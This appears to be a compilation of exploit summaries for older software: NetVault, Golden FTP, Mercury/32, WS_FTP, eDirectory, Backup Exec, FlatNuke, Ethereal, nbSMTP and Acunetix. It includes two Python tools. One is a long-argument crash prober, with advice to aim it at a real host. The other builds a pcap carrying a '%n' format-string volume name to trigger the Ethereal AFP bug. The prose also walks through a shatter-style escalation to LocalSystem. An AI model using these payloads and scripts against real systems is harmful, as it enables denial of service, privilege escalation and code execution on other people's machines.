This exploit escalates a local user to LocalSystem through a window-messaging (shatter-style) flaw in the BakBone Software NetVault application. The attacker uses the FindWindow() API to locate the hidden window belonging to C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe, which runs as LocalSystem, and then the ShowWindow() API to make that window visible. From the visible window the attacker uses the What's This? help feature to print a help topic, then the View Source feature to open Notepad, and from Notepad opens cmd.exe from the system32 directory. Each of these child processes is spawned by the LocalSystem process, so the resulting cmd.exe runs under the context of the LocalSystem account.
This exploit is for KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005). It sends a USER command whose argument is a long run of 'A' characters followed by 'BBBB'; the oversized argument overflows a buffer in the server and crashes it. (The 'BBBB' tail is there so the bytes that land in the overwritten register or return address are easy to recognise in the crash.)
This exploit crashes the Mercury/32 IMAP service listening on port 143. It sends a CHECK command followed by 512 'A' characters, which the service cannot handle and crashes on.
This exploit is for a buffer overflow vulnerability in WS_FTP Server Version 5.03. The exploit sends a specially crafted 'RNFR' command with an overly long argument to the FTP server, which causes a buffer overflow and crashes the service.
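The three proofs of concept above (Golden FTP Server, Mercury/32 and WS_FTP Server) share one shape: connect, send a single command with an oversized argument, and watch the service die. The following Python is an added example written for this page, not any of the original exploits' code: build_payload() produces the "<command> AAAA...BBBB\r\n" line the PoCs describe, and probe() classifies the service's reaction, distinguishing a dropped session from a dead listener by reconnecting. ToyService is a constructed stand-in daemon that "crashes" on a long argument so the probe can be run offline; it does not model any real product's behaviour.

```python
"""Long-argument crash probe plus a constructed stand-in service to run it against.
Added example for this page; not the Golden FTP, Mercury/32 or WS_FTP PoC code."""
import socket
import threading


def build_payload(command: bytes, length: int, tail: bytes = b"BBBB") -> bytes:
    """Return '<command> AAAA...<tail>\\r\\n'. The PoCs above use a tail of 'BBBB'
    so the bytes overwriting a saved return address are recognisable in a crash
    dump; pass tail=b'' for the plain 512-byte CHECK case."""
    return command + b" " + b"A" * length + tail + b"\r\n"


def probe(host: str, port: int, payload: bytes, timeout: float = 2.0) -> str:
    """Connect, read the banner, send the payload and classify the reaction:
    'alive'   - the service answered the command,
    'dropped' - the session died but the listener still accepts connections,
    'down'    - nothing is listening any more (the process most likely crashed)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)            # banner; not inspected
            s.sendall(payload)
            try:
                reply = s.recv(1024)
            except (ConnectionResetError, socket.timeout):
                reply = b""
    except (ConnectionRefusedError, socket.timeout):
        return "down"
    if reply:
        return "alive"
    # No answer: reconnect to tell a dropped session from a dead listener.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "dropped"
    except (ConnectionRefusedError, socket.timeout):
        return "down"


class ToyService(threading.Thread):
    """Constructed stand-in for a vulnerable daemon (not any real product): it
    answers commands normally but 'crashes' (stops listening and drops the
    client) when a command argument is longer than LIMIT bytes."""
    LIMIT = 256

    def __init__(self) -> None:
        super().__init__(daemon=True)
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))   # ephemeral port
        self.listener.listen(5)
        self.port = self.listener.getsockname()[1]

    def run(self) -> None:
        while True:
            try:
                conn, _ = self.listener.accept()
            except OSError:
                return                           # listener closed: we are 'dead'
            with conn:
                try:
                    conn.sendall(b"220 toy service ready\r\n")
                    line = b""
                    while b"\n" not in line:     # read one full command line
                        chunk = conn.recv(65536)
                        if not chunk:
                            break
                        line += chunk
                    arg = line.split(b" ", 1)[1].rstrip(b"\r\n") if b" " in line else b""
                    if len(arg) > self.LIMIT:
                        # Simulated crash: close the listener *before* the client
                        # socket so a probe that reconnects sees a refused connect.
                        self.listener.close()
                        return
                    conn.sendall(b"331 ok\r\n")
                except OSError:
                    continue


if __name__ == "__main__":
    svc = ToyService()
    svc.start()
    for size in (16, 1024):
        print(size, probe("127.0.0.1", svc.port, build_payload(b"USER", size)))
```

Against a real target, replace the toy with the host and port of the service and start with a length just above the documented size; the "down" result is the signal the PoCs above produce, and "dropped" usually means the daemon caught the error or a watchdog restarted it.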
This module exploits a stack overflow in the eDirectory 8.7.3 iMonitor service. The vulnerability was discovered by Peter Winter-Smith of NGSSoftware.
This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section.
A vulnerability exists in FlatNuke 2.5.5 (and possibly prior versions) that allows an attacker to execute arbitrary commands on the vulnerable system, because the application does not properly sanitize user-supplied input. An attacker can exploit it by sending a specially crafted request to the vulnerable application.
Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements. It runs on all popular computing platforms, including Unix, Linux, and Windows.

Ethereal v0.10.0 to v0.10.11 contains a remotely exploitable format string bug in its AFP dissector (packet-afp.c). The vulnerable function is dissect_reply_afp_get_server_param() in packet-afp.c. It uses get_name() to pluck a string (the "volume" name) from the packet and then passes that attacker-controlled string directly to proto_item_set_text(), which treats its argument as a printf-style format.

This exploit uses the DSI/afpovertcp TCP port (548) as the way in. That port does not have to be open anywhere: the packet only has to be seen by Ethereal, not answered, so spoofed packets work, and so does a connection to a different port, as explained below. If no dissector is registered for a packet's destination port, Ethereal may fall back to the source port to decide which dissector to use. Any destination port with no registered dissector will therefore do, as long as the source port is 548 (for example, port 80 will not work, but port 1234 will).

Exploitation is somewhat special: the only attacker-controlled data in the packet that is exploitable is the volume name, so the only way to exploit this is to send a packet whose "volume" field contains a format string.
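To make the packet layout concrete, here is an added Python example (written for this page, not the original exploit) that builds a two-packet capture: an FPGetSrvrParms request from a client, and the server's reply whose single volume name is a format string. The DSI header and FPGetSrvrParms reply layout follow the AFP/DSI specification; the addresses, MACs, sequence numbers and the default "%n" payload are assumptions. Note that in the reply 548 appears only as the source port, which is exactly the fallback the advisory describes. The resulting file is meant to be opened in a vulnerable Ethereal build; it has not been verified here against a specific version.

```python
"""Build a two-packet capture (AFP FPGetSrvrParms request and reply over DSI) whose
reply carries a format string in a volume name, to feed the packet-afp.c path
described above. Added example for this page; not the original exploit."""
import socket
import struct

DSI_COMMAND = 2            # DSI 'Command' packets carry AFP requests and replies
AFP_GET_SRVR_PARMS = 0x10  # FPGetSrvrParms function code
AFP_PORT = 548             # afpovertcp

# Constructed endpoints (assumed): only the ports matter to the dissector.
CLIENT, SERVER = ("10.0.0.2", 49152), ("10.0.0.1", AFP_PORT)


def dsi_header(is_reply: bool, request_id: int, payload_len: int, error: int = 0) -> bytes:
    """16-byte DSI header: flags, command, requestID, errorCode/dataOffset,
    totalDataLength, reserved (all big-endian)."""
    return struct.pack(">BBHIII", 1 if is_reply else 0, DSI_COMMAND,
                       request_id, error, payload_len, 0)


def afp_get_srvr_parms_request() -> bytes:
    """FPGetSrvrParms request: function code followed by a pad byte."""
    return struct.pack(">BB", AFP_GET_SRVR_PARMS, 0)


def afp_get_srvr_parms_reply(volumes, server_time: int = 0) -> bytes:
    """FPGetSrvrParms reply: ServerTime(4), NumVols(1), then per volume a flags
    byte and the name as a Pascal string. The name is the field get_name()
    extracts and the dissector hands to proto_item_set_text() as a format."""
    body = struct.pack(">IB", server_time, len(volumes))
    for name in volumes:
        raw = name.encode("ascii")
        if len(raw) > 255:
            raise ValueError("Pascal string limit is 255 bytes")
        body += struct.pack(">BB", 0, len(raw)) + raw
    return body


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; returns 0 over a correctly checksummed header."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack(">%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def frame(src, dst, seq: int, ack: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP (PSH,ACK) frame around payload, with valid checksums."""
    src_ip, dst_ip = socket.inet_aton(src[0]), socket.inet_aton(dst[0])
    tcp = struct.pack(">HHIIBBHHH", src[1], dst[1], seq, ack, 5 << 4, 0x18, 65535, 0, 0)
    pseudo = src_ip + dst_ip + struct.pack(">BBH", 0, 6, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack(">H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     1, 0, 64, 6, 0, src_ip, dst_ip)
    ip = ip[:10] + struct.pack(">H", checksum(ip)) + ip[12:]
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    return eth + ip + tcp + payload


def build_frames(volume_name: str = "%n%n%n%n%n%n") -> list:
    """Request from the client, then the reply carrying the format string. Only
    the reply's *source* port is 548: the fallback the advisory above describes."""
    req = afp_get_srvr_parms_request()
    rep = afp_get_srvr_parms_reply([volume_name])
    request = dsi_header(False, 1, len(req)) + req
    reply = dsi_header(True, 1, len(rep)) + rep
    return [frame(CLIENT, SERVER, 1000, 2000, request),
            frame(SERVER, CLIENT, 2000, 1000 + len(request), reply)]


def build_capture(volume_name: str = "%n%n%n%n%n%n") -> bytes:
    """Wrap the frames in a classic pcap file (linktype 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(build_frames(volume_name)):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    with open("afp_fmtstr.pcap", "wb") as fh:
        fh.write(build_capture())
```

The request packet is included because the AFP dissector decides how to parse a reply from the request it has already seen with the same DSI request ID; sending the reply alone on the wire, as the advisory suggests is possible, relies on the dissector's handling of an unmatched reply. Swap the "%n" payload for "%x%x%x" to get a harmless information leak in the packet details pane rather than a write.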
This is a remote format string exploit for nbSMTP v0.99. The vulnerability allows an attacker to execute arbitrary code on the target system by sending maliciously crafted data to the daemon. The exploit builds its buffer from a return address and a shellcode address and sends it to the vulnerable application. It was tested on Slackware Linux 9.0, 10.0 and 10.1.
This exploit causes a denial of service (DoS) against Acunetix HTTP Sniffer. It sends a large number of requests, each carrying an oversized Content-Length header, so the sniffer keeps allocating for bodies that never arrive until it runs out of memory and crashes.